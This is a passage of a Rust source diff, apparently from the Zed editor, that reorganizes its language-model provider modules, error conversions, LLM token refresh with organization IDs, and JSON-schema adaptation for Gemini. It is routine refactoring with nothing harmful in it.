anthropic::ApiError) -> Self { - use anthropic::ApiErrorCode::*; - let provider = ANTHROPIC_PROVIDER_NAME; - match error.code() { - Some(code) => match code { - InvalidRequestError => Self::BadRequestFormat { - provider, - message: error.message, - }, - AuthenticationError => Self::AuthenticationError { - provider, - message: error.message, - }, - PermissionError => Self::PermissionError { - provider, - message: error.message, - }, - NotFoundError => Self::ApiEndpointNotFound { provider }, - RequestTooLarge => Self::PromptTooLarge { - tokens: parse_prompt_too_long(&error.message), - }, - RateLimitError => Self::RateLimitExceeded { - provider, - retry_after: None, - }, - ApiError => Self::ApiInternalServerError { - provider, - message: error.message, - }, - OverloadedError => Self::ServerOverloaded { - provider, - retry_after: 
None, - }, - }, - None => Self::Other(error.into()), - } - } -} - -impl From for LanguageModelCompletionError { - fn from(error: open_ai::RequestError) -> Self { - match error { - open_ai::RequestError::HttpResponseError { - provider, - status_code, - body, - headers, - } => { - let retry_after = headers - .get(http::header::RETRY_AFTER) - .and_then(|val| val.to_str().ok()?.parse::().ok()) - .map(Duration::from_secs); - - Self::from_http_status(provider.into(), status_code, body, retry_after) - } - open_ai::RequestError::Other(e) => Self::Other(e), - } - } -} - -impl From for LanguageModelCompletionError { - fn from(error: OpenRouterError) -> Self { - let provider = LanguageModelProviderName::new("OpenRouter"); - match error { - OpenRouterError::SerializeRequest(error) => Self::SerializeRequest { provider, error }, - OpenRouterError::BuildRequestBody(error) => Self::BuildRequestBody { provider, error }, - OpenRouterError::HttpSend(error) => Self::HttpSend { provider, error }, - OpenRouterError::DeserializeResponse(error) => { - Self::DeserializeResponse { provider, error } - } - OpenRouterError::ReadResponse(error) => Self::ApiReadResponseError { provider, error }, - OpenRouterError::RateLimit { retry_after } => Self::RateLimitExceeded { - provider, - retry_after: Some(retry_after), - }, - OpenRouterError::ServerOverloaded { retry_after } => Self::ServerOverloaded { - provider, - retry_after, - }, - OpenRouterError::ApiError(api_error) => api_error.into(), - } - } -} - -impl From for LanguageModelCompletionError { - fn from(error: open_router::ApiError) -> Self { - use open_router::ApiErrorCode::*; - let provider = LanguageModelProviderName::new("OpenRouter"); - match error.code { - InvalidRequestError => Self::BadRequestFormat { - provider, - message: error.message, - }, - AuthenticationError => Self::AuthenticationError { - provider, - message: error.message, - }, - PaymentRequiredError => Self::AuthenticationError { - provider, - message: format!("Payment 
required: {}", error.message), - }, - PermissionError => Self::PermissionError { - provider, - message: error.message, - }, - RequestTimedOut => Self::HttpResponseError { - provider, - status_code: StatusCode::REQUEST_TIMEOUT, - message: error.message, - }, - RateLimitError => Self::RateLimitExceeded { - provider, - retry_after: None, - }, - ApiError => Self::ApiInternalServerError { - provider, - message: error.message, - }, - OverloadedError => Self::ServerOverloaded { - provider, - retry_after: None, - }, - } - } -} - #[derive(Debug, PartialEq, Clone, Copy, Serialize, Deserialize)] #[serde(rename_all = "snake_case")] pub enum StopReason { @@ -856,16 +675,6 @@ pub enum ConfigurationViewTargetAgent { Other(SharedString), } -#[derive(PartialEq, Eq)] -pub enum LanguageModelProviderTosView { - /// When there are some past interactions in the Agent Panel. - ThreadEmptyState, - /// When there are no past interactions in the Agent Panel. - ThreadFreshStart, - TextThreadPopup, - Configuration, -} - pub trait LanguageModelProviderState: 'static { type ObservableEntity; diff --git a/crates/language_model/src/model/mod.rs b/crates/language_model/src/model.rs similarity index 100% rename from crates/language_model/src/model/mod.rs rename to crates/language_model/src/model.rs diff --git a/crates/language_model/src/model/cloud_model.rs b/crates/language_model/src/model/cloud_model.rs index 18e099b4d6fc62867bf35fbd1d4573093af44744..db926aab1f70a46a4e70b1b67c2c9e4c4f465c2c 100644 --- a/crates/language_model/src/model/cloud_model.rs +++ b/crates/language_model/src/model/cloud_model.rs @@ -1,12 +1,9 @@ use std::fmt; use std::sync::Arc; -use anyhow::{Context as _, Result}; -use client::Client; use cloud_api_client::ClientApiError; -use cloud_api_types::websocket_protocol::MessageToClient; -use cloud_llm_client::{EXPIRED_LLM_TOKEN_HEADER_NAME, OUTDATED_LLM_TOKEN_HEADER_NAME}; -use gpui::{App, AppContext as _, Context, Entity, EventEmitter, Global, ReadGlobal as _}; +use 
cloud_api_client::CloudApiClient; +use cloud_api_types::OrganizationId; use smol::lock::{RwLock, RwLockUpgradableReadGuard, RwLockWriteGuard}; use thiserror::Error; @@ -26,92 +23,65 @@ impl fmt::Display for PaymentRequiredError { pub struct LlmApiToken(Arc>>); impl LlmApiToken { - pub async fn acquire(&self, client: &Arc) -> Result { + pub async fn acquire( + &self, + client: &CloudApiClient, + system_id: Option, + organization_id: Option, + ) -> Result { let lock = self.0.upgradable_read().await; if let Some(token) = lock.as_ref() { Ok(token.to_string()) } else { - Self::fetch(RwLockUpgradableReadGuard::upgrade(lock).await, client).await + Self::fetch( + RwLockUpgradableReadGuard::upgrade(lock).await, + client, + system_id, + organization_id, + ) + .await } } - pub async fn refresh(&self, client: &Arc) -> Result { - Self::fetch(self.0.write().await, client).await + pub async fn refresh( + &self, + client: &CloudApiClient, + system_id: Option, + organization_id: Option, + ) -> Result { + Self::fetch(self.0.write().await, client, system_id, organization_id).await + } + + /// Clears the existing token before attempting to fetch a new one. + /// + /// Used when switching organizations so that a failed refresh doesn't + /// leave a token for the wrong organization. 
+ pub async fn clear_and_refresh( + &self, + client: &CloudApiClient, + system_id: Option, + organization_id: Option, + ) -> Result { + let mut lock = self.0.write().await; + *lock = None; + Self::fetch(lock, client, system_id, organization_id).await } async fn fetch( mut lock: RwLockWriteGuard<'_, Option>, - client: &Arc, - ) -> Result { - let system_id = client - .telemetry() - .system_id() - .map(|system_id| system_id.to_string()); - - let result = client.cloud_client().create_llm_token(system_id).await; + client: &CloudApiClient, + system_id: Option, + organization_id: Option, + ) -> Result { + let result = client.create_llm_token(system_id, organization_id).await; match result { Ok(response) => { *lock = Some(response.token.0.clone()); Ok(response.token.0) } - Err(err) => match err { - ClientApiError::Unauthorized => { - client.request_sign_out(); - Err(err).context("Failed to create LLM token") - } - ClientApiError::Other(err) => Err(err), - }, - } - } -} - -pub trait NeedsLlmTokenRefresh { - /// Returns whether the LLM token needs to be refreshed. 
- fn needs_llm_token_refresh(&self) -> bool; -} - -impl NeedsLlmTokenRefresh for http_client::Response { - fn needs_llm_token_refresh(&self) -> bool { - self.headers().get(EXPIRED_LLM_TOKEN_HEADER_NAME).is_some() - || self.headers().get(OUTDATED_LLM_TOKEN_HEADER_NAME).is_some() - } -} - -struct GlobalRefreshLlmTokenListener(Entity); - -impl Global for GlobalRefreshLlmTokenListener {} - -pub struct RefreshLlmTokenEvent; - -pub struct RefreshLlmTokenListener; - -impl EventEmitter for RefreshLlmTokenListener {} - -impl RefreshLlmTokenListener { - pub fn register(client: Arc, cx: &mut App) { - let listener = cx.new(|cx| RefreshLlmTokenListener::new(client, cx)); - cx.set_global(GlobalRefreshLlmTokenListener(listener)); - } - - pub fn global(cx: &App) -> Entity { - GlobalRefreshLlmTokenListener::global(cx).0.clone() - } - - fn new(client: Arc, cx: &mut Context) -> Self { - client.add_message_to_client_handler({ - let this = cx.entity(); - move |message, cx| { - Self::handle_refresh_llm_token(this.clone(), message, cx); - } - }); - - Self - } - - fn handle_refresh_llm_token(this: Entity, message: &MessageToClient, cx: &mut App) { - match message { - MessageToClient::UserUpdated => { - this.update(cx, |_this, cx| cx.emit(RefreshLlmTokenEvent)); + Err(err) => { + *lock = None; + Err(err) } } } diff --git a/crates/language_model/src/provider.rs b/crates/language_model/src/provider.rs new file mode 100644 index 0000000000000000000000000000000000000000..707d8e2d618894e2898e253450dbfbb5e9483bba --- /dev/null +++ b/crates/language_model/src/provider.rs @@ -0,0 +1,12 @@ +pub mod anthropic; +pub mod google; +pub mod open_ai; +pub mod open_router; +pub mod x_ai; +pub mod zed; + +pub use anthropic::*; +pub use google::*; +pub use open_ai::*; +pub use x_ai::*; +pub use zed::*; diff --git a/crates/language_model/src/provider/anthropic.rs b/crates/language_model/src/provider/anthropic.rs new file mode 100644 index 
0000000000000000000000000000000000000000..0878be2070fdbb9e57145684f59c962a32bb9fd2 --- /dev/null +++ b/crates/language_model/src/provider/anthropic.rs @@ -0,0 +1,80 @@ +use crate::{LanguageModelCompletionError, LanguageModelProviderId, LanguageModelProviderName}; +use anthropic::AnthropicError; +pub use anthropic::parse_prompt_too_long; + +pub const ANTHROPIC_PROVIDER_ID: LanguageModelProviderId = + LanguageModelProviderId::new("anthropic"); +pub const ANTHROPIC_PROVIDER_NAME: LanguageModelProviderName = + LanguageModelProviderName::new("Anthropic"); + +impl From for LanguageModelCompletionError { + fn from(error: AnthropicError) -> Self { + let provider = ANTHROPIC_PROVIDER_NAME; + match error { + AnthropicError::SerializeRequest(error) => Self::SerializeRequest { provider, error }, + AnthropicError::BuildRequestBody(error) => Self::BuildRequestBody { provider, error }, + AnthropicError::HttpSend(error) => Self::HttpSend { provider, error }, + AnthropicError::DeserializeResponse(error) => { + Self::DeserializeResponse { provider, error } + } + AnthropicError::ReadResponse(error) => Self::ApiReadResponseError { provider, error }, + AnthropicError::HttpResponseError { + status_code, + message, + } => Self::HttpResponseError { + provider, + status_code, + message, + }, + AnthropicError::RateLimit { retry_after } => Self::RateLimitExceeded { + provider, + retry_after: Some(retry_after), + }, + AnthropicError::ServerOverloaded { retry_after } => Self::ServerOverloaded { + provider, + retry_after, + }, + AnthropicError::ApiError(api_error) => api_error.into(), + } + } +} + +impl From for LanguageModelCompletionError { + fn from(error: anthropic::ApiError) -> Self { + use anthropic::ApiErrorCode::*; + let provider = ANTHROPIC_PROVIDER_NAME; + match error.code() { + Some(code) => match code { + InvalidRequestError => Self::BadRequestFormat { + provider, + message: error.message, + }, + AuthenticationError => Self::AuthenticationError { + provider, + message: 
error.message, + }, + PermissionError => Self::PermissionError { + provider, + message: error.message, + }, + NotFoundError => Self::ApiEndpointNotFound { provider }, + RequestTooLarge => Self::PromptTooLarge { + tokens: parse_prompt_too_long(&error.message), + }, + RateLimitError => Self::RateLimitExceeded { + provider, + retry_after: None, + }, + ApiError => Self::ApiInternalServerError { + provider, + message: error.message, + }, + OverloadedError => Self::ServerOverloaded { + provider, + retry_after: None, + }, + }, + None => Self::Other(error.into()), + } + } +} diff --git a/crates/language_model/src/provider/google.rs b/crates/language_model/src/provider/google.rs new file mode 100644 index 0000000000000000000000000000000000000000..1caee496b519f395dd10744b127bc29ee893849f --- /dev/null +++ b/crates/language_model/src/provider/google.rs @@ -0,0 +1,5 @@ +use crate::{LanguageModelProviderId, LanguageModelProviderName}; + +pub const GOOGLE_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("google"); +pub const GOOGLE_PROVIDER_NAME: LanguageModelProviderName = + LanguageModelProviderName::new("Google AI"); diff --git a/crates/language_model/src/provider/open_ai.rs b/crates/language_model/src/provider/open_ai.rs new file mode 100644 index 0000000000000000000000000000000000000000..3796eb9a3aef78628c52d92e92fabb3812249e04 --- /dev/null +++ b/crates/language_model/src/provider/open_ai.rs @@ -0,0 +1,28 @@ +use crate::{LanguageModelCompletionError, LanguageModelProviderId, LanguageModelProviderName}; +use http_client::http; +use std::time::Duration; + +pub const OPEN_AI_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("openai"); +pub const OPEN_AI_PROVIDER_NAME: LanguageModelProviderName = + LanguageModelProviderName::new("OpenAI"); + +impl From for LanguageModelCompletionError { + fn from(error: open_ai::RequestError) -> Self { + match error { + open_ai::RequestError::HttpResponseError { + provider, + status_code, + body, + headers, 
+ } => { + let retry_after = headers + .get(http::header::RETRY_AFTER) + .and_then(|val| val.to_str().ok()?.parse::().ok()) + .map(Duration::from_secs); + + Self::from_http_status(provider.into(), status_code, body, retry_after) + } + open_ai::RequestError::Other(e) => Self::Other(e), + } + } +} diff --git a/crates/language_model/src/provider/open_router.rs b/crates/language_model/src/provider/open_router.rs new file mode 100644 index 0000000000000000000000000000000000000000..809e22f1fec0f2d205caa3ebbcb0baaf129b062c --- /dev/null +++ b/crates/language_model/src/provider/open_router.rs @@ -0,0 +1,69 @@ +use crate::{LanguageModelCompletionError, LanguageModelProviderName}; +use http_client::StatusCode; +use open_router::OpenRouterError; + +impl From for LanguageModelCompletionError { + fn from(error: OpenRouterError) -> Self { + let provider = LanguageModelProviderName::new("OpenRouter"); + match error { + OpenRouterError::SerializeRequest(error) => Self::SerializeRequest { provider, error }, + OpenRouterError::BuildRequestBody(error) => Self::BuildRequestBody { provider, error }, + OpenRouterError::HttpSend(error) => Self::HttpSend { provider, error }, + OpenRouterError::DeserializeResponse(error) => { + Self::DeserializeResponse { provider, error } + } + OpenRouterError::ReadResponse(error) => Self::ApiReadResponseError { provider, error }, + OpenRouterError::RateLimit { retry_after } => Self::RateLimitExceeded { + provider, + retry_after: Some(retry_after), + }, + OpenRouterError::ServerOverloaded { retry_after } => Self::ServerOverloaded { + provider, + retry_after, + }, + OpenRouterError::ApiError(api_error) => api_error.into(), + } + } +} + +impl From for LanguageModelCompletionError { + fn from(error: open_router::ApiError) -> Self { + use open_router::ApiErrorCode::*; + let provider = LanguageModelProviderName::new("OpenRouter"); + match error.code { + InvalidRequestError => Self::BadRequestFormat { + provider, + message: error.message, + }, + 
AuthenticationError => Self::AuthenticationError { + provider, + message: error.message, + }, + PaymentRequiredError => Self::AuthenticationError { + provider, + message: format!("Payment required: {}", error.message), + }, + PermissionError => Self::PermissionError { + provider, + message: error.message, + }, + RequestTimedOut => Self::HttpResponseError { + provider, + status_code: StatusCode::REQUEST_TIMEOUT, + message: error.message, + }, + RateLimitError => Self::RateLimitExceeded { + provider, + retry_after: None, + }, + ApiError => Self::ApiInternalServerError { + provider, + message: error.message, + }, + OverloadedError => Self::ServerOverloaded { + provider, + retry_after: None, + }, + } + } +} diff --git a/crates/language_model/src/provider/x_ai.rs b/crates/language_model/src/provider/x_ai.rs new file mode 100644 index 0000000000000000000000000000000000000000..3d0f794fa4087a4beeb4a9b6253d016a9b592f0e --- /dev/null +++ b/crates/language_model/src/provider/x_ai.rs @@ -0,0 +1,4 @@ +use crate::{LanguageModelProviderId, LanguageModelProviderName}; + +pub const X_AI_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("x_ai"); +pub const X_AI_PROVIDER_NAME: LanguageModelProviderName = LanguageModelProviderName::new("xAI"); diff --git a/crates/language_model/src/provider/zed.rs b/crates/language_model/src/provider/zed.rs new file mode 100644 index 0000000000000000000000000000000000000000..0ba793e99aad1caa25f049a96faf02c16e8970fa --- /dev/null +++ b/crates/language_model/src/provider/zed.rs @@ -0,0 +1,5 @@ +use crate::{LanguageModelProviderId, LanguageModelProviderName}; + +pub const ZED_CLOUD_PROVIDER_ID: LanguageModelProviderId = LanguageModelProviderId::new("zed.dev"); +pub const ZED_CLOUD_PROVIDER_NAME: LanguageModelProviderName = + LanguageModelProviderName::new("Zed"); diff --git a/crates/language_model/src/registry.rs b/crates/language_model/src/registry.rs index 
cf7718f7b102010cc0c8a981a0425583436176b7..bf14fbb0b5804505b33074e6e4cbcc36ddf21fab 100644 --- a/crates/language_model/src/registry.rs +++ b/crates/language_model/src/registry.rs @@ -101,7 +101,7 @@ impl ConfiguredModel { } pub fn is_provided_by_zed(&self) -> bool { - self.provider.id() == crate::ZED_CLOUD_PROVIDER_ID + self.provider.id() == crate::provider::ZED_CLOUD_PROVIDER_ID } } diff --git a/crates/language_model/src/request.rs b/crates/language_model/src/request.rs index 9be3002deae758ee99432842a31e3b90754ada0f..9a5e96078cd4d952185261c79032c5c5fdf30060 100644 --- a/crates/language_model/src/request.rs +++ b/crates/language_model/src/request.rs @@ -3,7 +3,6 @@ use std::sync::Arc; use anyhow::Result; use base64::write::EncoderWriter; -use cloud_llm_client::CompletionIntent; use gpui::{ App, AppContext as _, DevicePixels, Image, ImageFormat, ObjectFit, SharedString, Size, Task, point, px, size, @@ -234,7 +233,9 @@ pub struct LanguageModelToolResult { pub tool_use_id: LanguageModelToolUseId, pub tool_name: Arc, pub is_error: bool, + /// The tool output formatted for presenting to the model pub content: LanguageModelToolResultContent, + /// The raw tool output, if available, often for debugging or extra state for replay pub output: Option, } @@ -441,6 +442,21 @@ pub enum LanguageModelToolChoice { None, } +#[derive(Debug, PartialEq, Eq, PartialOrd, Ord, Hash, Clone, Copy, Serialize, Deserialize)] +#[serde(rename_all = "snake_case")] +pub enum CompletionIntent { + UserPrompt, + Subagent, + ToolResults, + ThreadSummarization, + ThreadContextSummarization, + CreateFile, + EditFile, + InlineAssist, + TerminalInlineAssist, + GenerateGitCommitMessage, +} + #[derive(Clone, Debug, Default, Serialize, Deserialize, PartialEq)] pub struct LanguageModelRequest { pub thread_id: Option, diff --git a/crates/language_model/src/role.rs b/crates/language_model/src/role.rs index 4b47ef36dd564e5950ce7d42a7e4f9263f3998b7..8abc0a74b271a3d434f8dbcf3093aee83e096a89 100644 --- 
a/crates/language_model/src/role.rs +++ b/crates/language_model/src/role.rs @@ -10,23 +10,6 @@ pub enum Role { } impl Role { - pub fn from_proto(role: i32) -> Role { - match proto::LanguageModelRole::from_i32(role) { - Some(proto::LanguageModelRole::LanguageModelUser) => Role::User, - Some(proto::LanguageModelRole::LanguageModelAssistant) => Role::Assistant, - Some(proto::LanguageModelRole::LanguageModelSystem) => Role::System, - None => Role::User, - } - } - - pub fn to_proto(self) -> proto::LanguageModelRole { - match self { - Role::User => proto::LanguageModelRole::LanguageModelUser, - Role::Assistant => proto::LanguageModelRole::LanguageModelAssistant, - Role::System => proto::LanguageModelRole::LanguageModelSystem, - } - } - pub fn cycle(self) -> Role { match self { Role::User => Role::Assistant, diff --git a/crates/language_model/src/tool_schema.rs b/crates/language_model/src/tool_schema.rs index f9402c28dc316f9ccdacc58afaa0eebd6699f92d..878870482a7527bf815797d16e03ad8edc79642e 100644 --- a/crates/language_model/src/tool_schema.rs +++ b/crates/language_model/src/tool_schema.rs @@ -17,7 +17,12 @@ pub enum LanguageModelToolSchemaFormat { pub fn root_schema_for(format: LanguageModelToolSchemaFormat) -> Schema { let mut generator = match format { - LanguageModelToolSchemaFormat::JsonSchema => SchemaSettings::draft07().into_generator(), + LanguageModelToolSchemaFormat::JsonSchema => SchemaSettings::draft07() + .with(|settings| { + settings.meta_schema = None; + settings.inline_subschemas = true; + }) + .into_generator(), LanguageModelToolSchemaFormat::JsonSchemaSubset => SchemaSettings::openapi3() .with(|settings| { settings.meta_schema = None; @@ -62,6 +67,7 @@ pub fn adapt_schema_to_format( if let Value::Object(obj) = json { obj.remove("$schema"); obj.remove("title"); + obj.remove("description"); } match format { @@ -100,9 +106,12 @@ fn adapt_to_json_schema_subset(json: &mut Value) -> Result<()> { ); } - const KEYS_TO_REMOVE: [(&str, fn(&Value) -> bool); 5] = [ 
+ const KEYS_TO_REMOVE: [(&str, fn(&Value) -> bool); 6] = [ ("format", |value| value.is_string()), - ("additionalProperties", |value| value.is_boolean()), + // Gemini doesn't support `additionalProperties` in any form (boolean or schema object) + ("additionalProperties", |_| true), + // Gemini doesn't support `propertyNames` + ("propertyNames", |_| true), ("exclusiveMinimum", |value| value.is_number()), ("exclusiveMaximum", |value| value.is_number()), ("optional", |value| value.is_boolean()), @@ -229,6 +238,28 @@ mod tests { "format": {}, }) ); + + // additionalProperties as an object schema is also unsupported by Gemini + let mut json = json!({ + "type": "object", + "properties": { + "name": { "type": "string" } + }, + "additionalProperties": { "type": "string" }, + "propertyNames": { "pattern": "^[A-Za-z]+$" } + }); + + adapt_to_json_schema_subset(&mut json).unwrap(); + + assert_eq!( + json, + json!({ + "type": "object", + "properties": { + "name": { "type": "string" } + } + }) + ); } #[test] diff --git a/crates/language_models/Cargo.toml b/crates/language_models/Cargo.toml index ece0d68152a20cbf77d0c082746959684816f115..4ebfce695e587265ea39077c67c84ce9b01e5352 100644 --- a/crates/language_models/Cargo.toml +++ b/crates/language_models/Cargo.toml @@ -20,7 +20,6 @@ aws-credential-types = { workspace = true, features = ["hardcoded-credentials"] aws_http_client.workspace = true base64.workspace = true bedrock = { workspace = true, features = ["schemars"] } -chrono.workspace = true client.workspace = true cloud_api_types.workspace = true cloud_llm_client.workspace = true @@ -48,6 +47,7 @@ menu.workspace = true mistral = { workspace = true, features = ["schemars"] } ollama = { workspace = true, features = ["schemars"] } open_ai = { workspace = true, features = ["schemars"] } +opencode = { workspace = true, features = ["schemars"] } open_router = { workspace = true, features = ["schemars"] } partial-json-fixer.workspace = true release_channel.workspace = true @@ -68,7 
+68,6 @@ vercel = { workspace = true, features = ["schemars"] } x_ai = { workspace = true, features = ["schemars"] } [dev-dependencies] -editor = { workspace = true, features = ["test-support"] } language_model = { workspace = true, features = ["test-support"] } pretty_assertions.workspace = true -project = { workspace = true, features = ["test-support"] } + diff --git a/crates/language_models/src/language_models.rs b/crates/language_models/src/language_models.rs index f22ea00c9e801e120bf057a06683487bc4deb22a..3154db91a43d1381f5b3f122a724be249adeb79b 100644 --- a/crates/language_models/src/language_models.rs +++ b/crates/language_models/src/language_models.rs @@ -3,6 +3,7 @@ use std::sync::Arc; use ::settings::{Settings, SettingsStore}; use client::{Client, UserStore}; use collections::HashSet; +use credentials_provider::CredentialsProvider; use gpui::{App, Context, Entity}; use language_model::{LanguageModelProviderId, LanguageModelRegistry}; use provider::deepseek::DeepSeekLanguageModelProvider; @@ -24,51 +25,65 @@ use crate::provider::ollama::OllamaLanguageModelProvider; use crate::provider::open_ai::OpenAiLanguageModelProvider; use crate::provider::open_ai_compatible::OpenAiCompatibleLanguageModelProvider; use crate::provider::open_router::OpenRouterLanguageModelProvider; +use crate::provider::opencode::OpenCodeLanguageModelProvider; use crate::provider::vercel::VercelLanguageModelProvider; use crate::provider::vercel_ai_gateway::VercelAiGatewayLanguageModelProvider; use crate::provider::x_ai::XAiLanguageModelProvider; pub use crate::settings::*; pub fn init(user_store: Entity, client: Arc, cx: &mut App) { + let credentials_provider = client.credentials_provider(); let registry = LanguageModelRegistry::global(cx); registry.update(cx, |registry, cx| { - register_language_model_providers(registry, user_store, client.clone(), cx); + register_language_model_providers( + registry, + user_store, + client.clone(), + credentials_provider.clone(), + cx, + ); }); // 
Subscribe to extension store events to track LLM extension installations if let Some(extension_store) = extension_host::ExtensionStore::try_global(cx) { cx.subscribe(&extension_store, { - let registry = registry.clone(); - move |extension_store, event, cx| match event { - extension_host::Event::ExtensionInstalled(extension_id) => { - if let Some(manifest) = extension_store - .read(cx) - .extension_manifest_for_id(extension_id) - { - if !manifest.language_model_providers.is_empty() { - registry.update(cx, |registry, cx| { - registry.extension_installed(extension_id.clone(), cx); - }); + let registry = registry.downgrade(); + move |extension_store, event, cx| { + let Some(registry) = registry.upgrade() else { + return; + }; + match event { + extension_host::Event::ExtensionInstalled(extension_id) => { + if let Some(manifest) = extension_store + .read(cx) + .extension_manifest_for_id(extension_id) + { + if !manifest.language_model_providers.is_empty() { + registry.update(cx, |registry, cx| { + registry.extension_installed(extension_id.clone(), cx); + }); + } } } - } - extension_host::Event::ExtensionUninstalled(extension_id) => { - registry.update(cx, |registry, cx| { - registry.extension_uninstalled(extension_id, cx); - }); - } - extension_host::Event::ExtensionsUpdated => { - let mut new_ids = HashSet::default(); - for (extension_id, entry) in extension_store.read(cx).installed_extensions() { - if !entry.manifest.language_model_providers.is_empty() { - new_ids.insert(extension_id.clone()); + extension_host::Event::ExtensionUninstalled(extension_id) => { + registry.update(cx, |registry, cx| { + registry.extension_uninstalled(extension_id, cx); + }); + } + extension_host::Event::ExtensionsUpdated => { + let mut new_ids = HashSet::default(); + for (extension_id, entry) in extension_store.read(cx).installed_extensions() + { + if !entry.manifest.language_model_providers.is_empty() { + new_ids.insert(extension_id.clone()); + } } + registry.update(cx, |registry, cx| { + 
registry.sync_installed_llm_extensions(new_ids, cx); + }); } - registry.update(cx, |registry, cx| { - registry.sync_installed_llm_extensions(new_ids, cx); - }); + _ => {} } - _ => {} } }) .detach(); @@ -97,10 +112,15 @@ pub fn init(user_store: Entity, client: Arc, cx: &mut App) { &HashSet::default(), &openai_compatible_providers, client.clone(), + credentials_provider.clone(), cx, ); }); + let registry = registry.downgrade(); cx.observe_global::(move |cx| { + let Some(registry) = registry.upgrade() else { + return; + }; let openai_compatible_providers_new = AllLanguageModelSettings::get_global(cx) .openai_compatible .keys() @@ -113,6 +133,7 @@ pub fn init(user_store: Entity, client: Arc, cx: &mut App) { &openai_compatible_providers, &openai_compatible_providers_new, client.clone(), + credentials_provider.clone(), cx, ); }); @@ -127,6 +148,7 @@ fn register_openai_compatible_providers( old: &HashSet>, new: &HashSet>, client: Arc, + credentials_provider: Arc, cx: &mut Context, ) { for provider_id in old { @@ -141,6 +163,7 @@ fn register_openai_compatible_providers( Arc::new(OpenAiCompatibleLanguageModelProvider::new( provider_id.clone(), client.http_client(), + credentials_provider.clone(), cx, )), cx, @@ -153,6 +176,7 @@ fn register_language_model_providers( registry: &mut LanguageModelRegistry, user_store: Entity, client: Arc, + credentials_provider: Arc, cx: &mut Context, ) { registry.register_provider( @@ -166,58 +190,105 @@ fn register_language_model_providers( registry.register_provider( Arc::new(AnthropicLanguageModelProvider::new( client.http_client(), + credentials_provider.clone(), cx, )), cx, ); registry.register_provider( - Arc::new(OpenAiLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(OpenAiLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - Arc::new(OllamaLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(OllamaLanguageModelProvider::new( + 
client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - Arc::new(LmStudioLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(LmStudioLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - Arc::new(DeepSeekLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(DeepSeekLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - Arc::new(GoogleLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(GoogleLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( - MistralLanguageModelProvider::global(client.http_client(), cx), + MistralLanguageModelProvider::global( + client.http_client(), + credentials_provider.clone(), + cx, + ), cx, ); registry.register_provider( - Arc::new(BedrockLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(BedrockLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( Arc::new(OpenRouterLanguageModelProvider::new( client.http_client(), + credentials_provider.clone(), cx, )), cx, ); registry.register_provider( - Arc::new(VercelLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(VercelLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), + cx, + )), cx, ); registry.register_provider( Arc::new(VercelAiGatewayLanguageModelProvider::new( client.http_client(), + credentials_provider.clone(), + cx, + )), + cx, + ); + registry.register_provider( + Arc::new(XAiLanguageModelProvider::new( + client.http_client(), + credentials_provider.clone(), cx, )), cx, ); registry.register_provider( - Arc::new(XAiLanguageModelProvider::new(client.http_client(), cx)), + Arc::new(OpenCodeLanguageModelProvider::new( + 
client.http_client(), + credentials_provider, + cx, + )), cx, ); registry.register_provider(Arc::new(CopilotChatLanguageModelProvider::new(cx)), cx); diff --git a/crates/language_models/src/provider.rs b/crates/language_models/src/provider.rs index 27f43e37f5be343c3f80201c013e96d858bb00de..d3c433974599399160e602b8f201b9fd0af874cb 100644 --- a/crates/language_models/src/provider.rs +++ b/crates/language_models/src/provider.rs @@ -10,6 +10,7 @@ pub mod ollama; pub mod open_ai; pub mod open_ai_compatible; pub mod open_router; +pub mod opencode; mod util; pub mod vercel; pub mod vercel_ai_gateway; diff --git a/crates/language_models/src/provider/anthropic.rs b/crates/language_models/src/provider/anthropic.rs index d3bd129248406211e43e69fc5880310a9dedbc97..c1b8bc1a3bb1b602b67ae5563d8acc3b05a94d47 100644 --- a/crates/language_models/src/provider/anthropic.rs +++ b/crates/language_models/src/provider/anthropic.rs @@ -1,14 +1,18 @@ +pub mod telemetry; + use anthropic::{ ANTHROPIC_API_URL, AnthropicError, AnthropicModelMode, ContentDelta, CountTokensRequest, Event, ResponseContent, ToolResultContent, ToolResultPart, Usage, }; use anyhow::Result; use collections::{BTreeMap, HashMap}; +use credentials_provider::CredentialsProvider; use futures::{FutureExt, Stream, StreamExt, future::BoxFuture, stream::BoxStream}; use gpui::{AnyView, App, AsyncApp, Context, Entity, Task}; use http_client::HttpClient; use language_model::{ - ApiKeyState, AuthenticateError, ConfigurationViewTargetAgent, EnvVar, IconOrSvg, LanguageModel, + ANTHROPIC_PROVIDER_ID, ANTHROPIC_PROVIDER_NAME, ApiKeyState, AuthenticateError, + ConfigurationViewTargetAgent, EnvVar, IconOrSvg, LanguageModel, LanguageModelCacheConfiguration, LanguageModelCompletionError, LanguageModelCompletionEvent, LanguageModelId, LanguageModelName, LanguageModelProvider, LanguageModelProviderId, LanguageModelProviderName, LanguageModelProviderState, LanguageModelRequest, @@ -24,12 +28,12 @@ use ui::{ButtonLink, ConfiguredApiCard, List, 
